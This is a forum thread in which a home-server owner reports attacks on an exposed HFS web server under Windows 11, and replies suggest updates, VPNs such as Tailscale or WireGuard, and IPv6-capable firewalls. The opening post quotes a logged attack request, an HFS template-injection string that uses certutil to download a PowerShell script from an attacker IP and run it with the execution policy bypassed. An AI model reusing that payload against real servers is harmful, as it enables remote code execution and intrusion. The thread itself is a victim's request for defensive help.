Attack on my Home Server

arup

Level F
I've been running a home server (OS- Win11 23H2) for accessing as tally licence server as well as some storage. It has a static IP.
Anything was not encrypted till now and anyone can access if they know the IP (I don't tell anyone the IP.
Today when I logged into it, there was a long list of windows defender blocked threat.
1730874458191.png

I checked for the source and found that it comes from the port 80 open in HFS.
103.87.240.114:36368 Requested GET /?n=> &cmd=cmd /c certutil -url""""cache -split -f http://103.87.240.114:8084/download "logs1.ps1" && powershell -ExecutionPolicy Bypass -File "logs1.ps1"&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
I was unaware that a simple HTTP host can be triggered externally to execute commands.
1730874716946.png

The WHOIS of the malicious IP dirtects to Hong Kong.
1730874817721.png

I've executed a full system scan through windows defender and didn't find any threats.
I've turned on the HTTP server again, and again I face incoming traffic from that IP address.
1730875370806.png

I've banned the IP address , but the attacker might use another IP for the same as well.

Is there any option for blocking cmd lines from execution if it's pushed by browser requests like this to a HTTP server.
I've banned the IP address , but the attacker might use another IP for the same as well.
It's indeed true. Now I'm getting malicious traffic from
125.229.247.222
95.214.55.138
Right Now , I've turned off the HTTP server completely unless I find a solution.
 
Last edited:
I have a server on cloud, and it is constantly being scanned and tested, most frequently by scripts looking for wordpress / php vulnerabilities. Whatever server you're using: keep it up to date. Make sure the update is automatic, don't wait for human input for it to be updated. That should suffice.

When your server got the malicious request, what did it do? Did it actually execute the payload? That would be a major flaw in the server software. You should find a different server, if it is not yet patched (for example, you can set up nginx to reverse proxy requests to your server of choice, and you can set it up so that nginx only forwards URL patterns you recognize)

EDIT: As @bobbyprajan said above, if this is scary, remove the open port and switch to a VPN solution (like tailscale, which is free for personal use)
 
Last edited:
A lot of folks seem to be suggesting that closing ports on router is a solution..
However Unless you are on a local ISP, all your devices anyway are fully exposed to the Internet with fully addressable ipv6 public addresses.

Unfortunately majority of consumer routers do not have any kind of firewall - which was OK with ipv4 due to the router NAT so you got security as a side effect of NATing from a single public ip.
No longer true though

Earlier scans and attacks were prevalent only on ipv4 but IPv6 scans and attacks are getting increasingly common now.
 
When your server got the malicious request, what did it do? Did it actually execute the payload?
Server actually processes the request and tries to execute the malicious code through command prompt (cmd) and at the time of attack, server stops responding for a few seconds until the malicious code is eventually blocked by windows defender, thereafter server acts normal till the next attack.
 
Server actually processes the request and tries to execute the malicious code through command prompt (cmd) and at the time of attack, server stops responding for a few seconds until the malicious code is eventually blocked by windows defender, thereafter server acts normal till the next attack.
I think this is very serious. You should not be using / exposing a server that acts on external requests in this way.

EDIT: Clarifying
- if the request is anonymous, a server may respond to read-only requests for public data
- if the request is authenticated, only then a server can try to do other things, like executing code or mutating state
You should figure out how to restrict calls to authenticated users only ASAP
 
A lot of folks seem to be suggesting that closing ports on router is a solution..
However Unless you are on a local ISP, all your devices anyway are fully exposed to the Internet with fully addressable ipv6 public addresses.

Unfortunately majority of consumer routers do not have any kind of firewall - which was OK with ipv4 due to the router NAT so you got security as a side effect of NATing from a single public ip.
No longer true though

Earlier scans and attacks were prevalent only on ipv4 but IPv6 scans and attacks are getting increasingly common now.
Whats the solution then?
 
Whats the solution then?
Ideally a firewall that can handle ipv6.

I have been on opnsense as my primary router for a while now so no impact due to ipv6 transition.. so that is one option

Because of the above, i havent really explored if any of the newer consumer routers come with a firewall - but that could be option two
 
Anything was not encrypted till now and anyone can access if they know the IP (I don't tell anyone the IP.

ummm, isnt this the reason for being attacked? "anyone can access if they know the IP" - i mean , there are plenty of botnets continually scanning public IPs for known services/login and here you've left it "not encrypted" meaning I guess no login page or something like that?
 
Anything was not encrypted till now and anyone can access if they know the IP

Wait, you had... a windows machine exposed to the internet... DIRECTLY?! That should never be done. It's never safe. Exposing services through a static ip has never been a good idea, not even twenty years ago when everyone had their own private FTP server running on their desktop.

Set up Tailscale, or Wireguard. Use that and only that to connect two private networks across the internet. They're both free.
 
A lot of folks seem to be suggesting that closing ports on router is a solution..
However Unless you are on a local ISP, all your devices anyway are fully exposed to the Internet with fully addressable ipv6 public addresses.

Unfortunately majority of consumer routers do not have any kind of firewall - which was OK with ipv4 due to the router NAT so you got security as a side effect of NATing from a single public ip.
No longer true though

Earlier scans and attacks were prevalent only on ipv4 but IPv6 scans and attacks are getting increasingly common now.
Disabling ipv6 at the router level would help?
 
Wait, you had... a windows machine exposed to the internet... DIRECTLY?! That should never be done. It's never safe. Exposing services through a static ip has never been a good idea, not even twenty years ago when everyone had their own private FTP server running on their desktop.

Set up Tailscale, or Wireguard. Use that and only that to connect two private networks across the internet. They're both free.
PM'd you for seeking some advice.
 
Back
Top